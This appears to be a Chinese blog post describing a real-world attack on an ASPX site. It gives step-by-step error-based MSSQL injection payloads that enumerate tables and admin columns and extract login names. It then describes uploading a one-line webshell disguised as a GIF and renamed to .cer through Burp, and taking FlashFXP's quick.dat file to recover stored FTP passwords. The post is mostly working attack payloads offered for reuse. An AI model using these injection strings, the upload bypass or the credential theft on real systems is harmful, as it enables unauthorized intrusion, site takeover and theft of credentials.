×

新闻动态 资料下载

一次工作中手注ASPX+getshell案例

0x_www 0x_www 发表于2021-05-17 12:44:09 浏览920 评论0

抢沙发发表评论


一次工作中手注ASPX+getshell案例

漏洞:SQL注入

由于username参数过滤不严,导致可提交sql查询语句表达式导致SQL注入漏洞


' having 11=1--


QQ截图20210517124447.jpg



QQ截图20210517124508.jpg




发现报错,可能存在注入

那么我们接下来,使用手工注入的方式

1' and 2=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1


QQ截图20210517124529.jpg



发现一张表,但不是我们想要的

 

继续注入


1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('AdminResource'))) and '1'='1



QQ截图20210517124609.jpg




也不是想要的

依次类推

我们直接使用

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('AdminResource','ContentNewTVLog','AdminRole','ContentInject','AdminRole_Resource'))) and '1'='1



QQ截图20210517124644.jpg




这张表有点可疑

我们直接去找一下表的内容

1' and 1=convert(int,(select top 1 col_name(object_id ('Admins'),1) from Admins)) and '1'='1




换一个

1' and 1=convert(int,(select top 1 col_name(object_id ('Admins'),2) from Admins)) and '1'='1




QQ截图20210517124715.jpg




记住这两个

然后拼写

 

1' and 1=convert(int,(select top 1 LogName from Admins)) and '1'='1



QQ截图20210517124747.jpg



QQ截图20210517124803.jpg



进入后台

准备一句话木马,GIF89a

上传格式点击burp抓包,改为cer即可


QQ截图20210517124833.jpg




QQ截图20210517124907.jpg




其中发现有FTP文件,D:\FlashFXP\

下载FXP的quick.dat文件,替换掉

可用星号密码器得到密码

 

QQ截图20210517124942.jpg